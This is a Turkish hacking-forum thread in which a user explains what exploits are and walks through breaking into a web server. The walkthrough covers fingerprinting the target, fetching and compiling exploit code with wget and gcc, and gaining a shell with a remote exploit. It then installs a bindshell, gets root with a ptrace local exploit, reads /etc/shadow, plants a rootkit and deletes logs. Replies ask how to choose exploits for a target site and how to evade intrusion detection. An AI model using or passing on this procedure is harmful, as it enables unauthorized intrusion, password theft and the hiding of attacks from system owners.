Exploit nedir? Nasıl kullanılır?

cartman

Katılımcı Üye
28 Ara 2005
932
17
zBjk
Üzerine kurulu daemon ların açığını kullanarak yada local attack lar düzenleyerek sistemi sahiplenebiliriz.. Bu olayları gerçekleştirirken biz Sistem açıklarını kullanmamızı sağlayan minik progragr*****lar olan Exploit leri kullanırız..

Exploit Nedir:Exploitler genel olarak .c ve .pl uzantılı dosyalardır içinde kodlar vardır.. .c uzantılı olan dosyalar C dili ile yazılmış kaynak kodları içerir .pl olanlarda perl dili ile yazılmış kodları içerir.. Bunlar haricinde assembly dili ile yazılmış olanlarda vardır..
Şimdi bu exploitleri yazan şhısların C dilini yalamış yutmuş sistemleri gözü kapalı anlatabilecek seviyede olan hacker lar ın yazdığınıda söylemek isterim.. Exploitler attack türüne göre 2 ye ayrılır..
1- Local Attack..
2- Remote Attack..


Yüzeysel olarak anlatmak gerekirse Local attack uygularken sen olduğun makinadaki kısıtlı yetkini aşıp root olmak için uğraşırsın.. Bunun için local root exploitler kullanılır.. Tabi burda genel konuşuyorum başka amaçlar içinde local Exploitler kullanılabiliyor.. Remote Attacklar ise Alakan olmayan bir makina örneğin bir web server burda senin account un yok bu makinaya local bir attack düzenleyemezsin.. Bunun için remote türü attacklar la remote exploitler kullanılabilir.. Bu remote Exploitlerin bir kısmı seni makineye düşürür sonrasında local root türü bir exploitle root yetkisine geçersin.. Bi kısmıda Remote Root tur içeri düştüğün zaman id kısmında Root yazar.. Kısaca mantık budur.. Exploitler kaynak kod halinde olduğu için bunlar Compile (derlemek) edilmelidir.. Bunun için windows altında çalışan compiler lar mevcut olsada.. Exploitler in geneli Linux makinede Compile edilmek üzere tasarlanır.. Yani o şekil yazılır.. windows altında compile etmek isteyince .h library hatası verecektir.. Linux makinedeki "gcc" Compileri bu iş için çok uygundur.. Exploitleri compile etmek için 1 kaç seçenek doğuyor.. 1 Shell hesabı alarak oradaki gcc compilerini kullanabilirsiniz.. Yada kendi bilgisayarınız herhangi bir Linux dağıtımını yükleyebilir komut satırını shell olarak kullanabilirsiniz.. Tavsiyem shell dir.. Hem komut tabanlı kullanılıyor hemde bağlantı hızı oldukça iyidir.. Shell kvramını bilmeyenler için açıklamak istiyorum..

Shell Nedir : Shell Linux işletim sistemi kullanan bir makineden size verilen kısıtlı yetkilere sahip olduğunuz alan dır.. Bi yerdir yani.. Bu alana putty programı aracılığı ile bağlanılabilir.. Kullanılan port ve protokol ; SSH protokolu ve 22. Porttur.. SSH güvenlidir.. telnet gibi değildir yani.. Bu Shell hesabına ircd kurulabildiği gibi exploit compile olaylarıda yapılabiliyor.. Bu kısım anlaşılmıştır umarım.. birazda putty programına değinelim..
Putty Nedir : Putty Telnet/SSH Clientidir.. Bu programla telnet ve SSH sunucularına rahatlıkla bağlanabilir komutları program üzerinden girebilirsiniz... Kullanımı oldukça basittir..Download bölümünde putty programı mevcuttur.. Şimdi putty i download ettikten sonra... programı çalıştırın... "Host Name ( or IP adress)" yazan kutucuğa shell inizin ip sini yazacaksınız... Hemen o kutucuğun altında "Protocol" seçenekleri var bağlanmak istediğiniz sistemin protokolune göre ordan birini seçeceksiniz SSH sunucusuna bağlanıorsanız "SSH" yi telnet sunucusuna bağlanıorsanız "Telnet" i seçeceksiniz.. Bizim bağlanacağımız sistem linux olduğuna göre ve bu sistem SSH protololu kullandığı için "SSH" yi seçiyoruz.. "SSH" yi seçtikten sonra sağ alttaki "open" botonuna basın... Önünüze siyah bir ekran çıkacaktır buraya Shell username inizi yazın enterlayın.. Pass inizi isteyecek onuda yazıp enterlayın... Shelle bağlanmış olacaksınız... Şimdi Linux makinaya bağlanmış olduğumuza göre bi kaç linux komutundan bahsedeyim...
ls : olduğunuz dizindeki dosyaları listeler.. (örnek: ls )
rm -rf dosyaadi : belirttiğiniz dosyayı siler.. (örnek: rm -rf apache.c)
wget : Dosya çekmeye yarar... (örnek: wget http://http://[/URL]xxxx.com/Apache_1.3.x.c)
gcc -o : C dilinde yazılmış programları derleme komutudur... Biz genellikle bunu exploit kodlarını derlemek için kullanacağız (örnek: gcc -o Apache Apache_1.3.x.c)
./ : Çalıştırma komutudur.. (örnek: ./Apache)

Exploit Compile Nasıl yapılır : Şimdi Shell imiz var ve putty programı ile shell imize bağlandığımızı var syarak anlatıyorum... Öncelikle kullanacağımız 3-5 temel komutumuz var.. bunları örneklerle açıklayacağız..

"wget http://http://[/URL]xxx.com/Gtkftp_v1.0.4.c" Bu komutla http://http://[/URL]xxx.com/Ftkftp_v1.0.4.c isimli dosyayı çekioruz yani wget komutu dosya çekmeye yarıor....
"gcc -o Gtkftp Gtkftp_v1.0.4.c" Bu komutla Gtkftp_v1.0.4.c isimli exploiti derliyoruz... ama derlenmiş olan exploiti Gtkftp adında kaydediyoruz... Bu komutla bu dediklerim oluyo...
"./Gtkftp" Komutu ile bu exploitle birlikte kullanabileceğim parametreleri gördüm... Yani exploiti çalıştırmayı denedim ama yetersiz parametre kullandığım için bana açıklama verdi kullanabileceğim parametrelerin bi listesini verdi....
"./Gtkftp -h www.yyyyy.com" Komutu ile www.yyyyy.com sitesi üzerine bu exploiti çalıştırmayı denedim ama verdiği uyarıda www.yyyyy.com sitesi "<- 220 ProFTPD 1.2.7 Server (ProFTPD) [OEI.guncelturk.net]
[!] error: this exploit is only for GtkFTPd, failed.
" proFTPD kullanıor ve bu exploit sadece Gtk ftp kullanan host larda çalışır dio...
Exloit compile etme ve çalıştırma olayıda açıklığa kavştu Şimdi bir sisteme nasıl girilir onu görelim..

Exploit Kullanarak Sisteme girmek :

Şimdi en can alıcı noktaya geldik... Yukarda örnekle gösterdiklerimi şimdi uygulamaya dökeceğim... Bunun için öncelikle bir hedef belirlemem gerekiyor... www.XXXXXX.com serverlarına gireceğim.. işlem sırasına gelince..
1- www.netcraft.com sitesinden server infosunu almak.. yada sitemizde werdiğimiz scan_projecti kullanarak httpd server infosuna bakmak..
2- Gerekli exploiti temin etmek...
3- Shell ’e login olup gerekli exploiti shell e çekmek ve kullanmak...
4- Servera bindshell kurmak...(bunu loglara kayitlanmamak için yapiyoruz ve ayrıca shelin kapatilmasi söz konusu olabilir..
5- Serverda root olmak...
6- Rookit kurmak (binshelle idare ederim diyorsanız gerek yok)
6- Loglari silmek
İşlemleri sırasıyla yapıyorum...

1- Server infosunu aldım.. Kullanılan server bilgileri şöyle;
The site www.XXXXXX.com is running Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6 PHP/4.0.4pl1 mod_perl/1.24_01 on Linux.
2- 7350 fun Exploit i ile bu servera girebilirim...
3- Shell e login oldum... Exploiti çektim çalıştırdım...
4- HPbindshell i kurdum...
5- ptrace-kmod exploiti ile serverda root oldum...

7350 exploiti kaynak kod halinde deil derlenmiş halde dağıtılıyor ayrıca eski bir exploittir...

7350 yi hebele olarak shell e kaydettim... Kulandığım komuta gelince... Exploit brute force yöntemi ile çalışıor... Ben brute force un etkili olduu kısmı direkt yazarak kısa yoldan sisteme girdim.. Screenshot un sonunda yazan yazılar gelince bi süre bekledikten sonra shell e düşürecektir..Sonraki işlemler... Aslında istesek bu şekilde shell kullanarak oraya girebiliriz... Ama bi süre sonra Read Error verip bizi düşürecektir...O yüzden bindshell türü bir program kurarak bu sorunu hallederiz... Ama öncelikle yazma iznimizin olduğu bir klasöre girelim genel olarak /tmp/ dizininie yazma iznimiz vardır bazı sistem yöneticileri bunuda kaldırıyor ama nadir olan bi olay.. Tmp dizinine geçmek için "cd /tmp" komutunu uygulayın...

Bind Shell kurulumu : Şimdi sisteme bindshell denilen bi çeşit trojan niteliği taşıyan bir program kurmak gerekecek.. amacı sistemdeki belirli bir portu bindshell olarak açması ve buraya bağlanmayı sağlamasıdır.. Exploitle içeri düşünce bi nevi shell hesabımız oluyor o makinada.. ama anonymous bir shell.. id mizde nobOdy yada farklı bişey yazar.. Normal de Shell hesabı olanların /home/ dizini altında bir klasörü olur.. Gerçi klasör olayı root a bağlıdır ama geneli böyledir.. bu Anonymous girişte bu dizin altında klasörümüz olmaz.. bindshell kuruyoruz çünki her zaman exploiti kullanıp sisteme remote attack düzenlemek zorunda kalmayalım diye.. Her zaman Exploitin sonuç vereceği kesin değildir açık patch lenmiş olabilir.. ve Exploitlerin kısa sürede sonuç vereceğide kesin değildir.. Neyse bindshell kurulumunun anlatılacak bi tarafı yok ./bindshel deyip kurulur.. Sonrasında sistem hakkında biraz bilgi alarak siste! min nasıl rootlanacağına bakılır.. "uname -r" Komutu ile kernel in sürümü öğrenilip buna göre local root exploit uygulanabilir yada "ps x" gibi komutlarlada çalışan uygulama ve programlara görede bakılabilir.. Burada biraz Linux bilgisi ister... Şimdi şu kısıma dikkat edin.. Öncelikle bir remote attack düzenledik sisteme girdik.. Şimdi ise bir local attack düzenleyip root olmaya çalıştık.. işlem sırası o şekilde ilerliyor.. Önce sisteme girmek gerekir sonra local bir attackla sisteme sahip olamk gerekir... Sistemde bir hesabınız olursa remote attack kısmını eleyip local attack yöntemlerine bakarsınız olay bu... Sistemdeki Şifreleri almak için "cat /etc/shadow" komutunu uygulayıp /etc/ dizini altındaki "shadow" isimli dosyanın içeriği ekrana basabilir shadow pass leri alabilirsiniz.. ama sistemde root olduktan sonra ne gereği varki zaten sistemdeki istediğiniz her dosyaya her siteye erişim sağlarsınız.. Root olduktan sonra sisteme bir rootkit kurarak gizli giriş çıkış yapabilirsiniz..
(alıntı yapılarak derlenmiştir.......)
 
Moderatör tarafında düzenlendi:

HackerC*

Yeni üye
22 Mar 2006
12
0
sağol ama bu siteyi biliyorum benim istediğim örneğin www.xxx.com bunu hackleyecez ve www.****.com da taradık ve çıkan sonuçtan ben hangi exploiti kullanacağımı nerden anlayacağım.Yardımcı olursanız sevinirim.
 
Moderatör tarafında düzenlendi:

NightWolf

Emektar
27 Ara 2005
722
11
about:home
Portalına Bakacan Ona Göre Exploit bulacan Deniyecen Site İsmi Vermek Yasak Ama o Dediğin Site NetCra... Html ile Yapılmış Html Site Hacklemek Zor Bildiğim Kadarıylada Html İçin Exploit Yok
 

m@kRoh@Ck

Yeni üye
1 May 2007
23
0
güncel exploıtler var arkadaşlar ve bunların google yada diğer motorlarda arama kodları var yani inurl filan bu şekilde güncel açıklardan yararlanabilirsiniz ve www.milworm.com dada güncel açıklar sürekli verilir orayı takip edin
 

highseverity

Yeni üye
7 Nis 2007
28
0
degerli cartman teşekkürler..

Merhaba, değerli komutanım.. Exploitler hakkında anlattıklarınız çok güzel.. bu işleri yapabilmek için, linux ve yazılım bilmek şart.. exploitler bizi nasıl ele vermez, yada karşı sistem bunu farketmemeli dersek, kodlara ne eklememiz gerekir. ip spoofing
işi tek başına çözemiyor. hatta mac spoofing de dahil.. mesela IDP/IPS sistemler bu tür durumları attack olarak imzalıyor.. yardım ederseniz çok sevinirim. saygılar sayın komutanım..
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.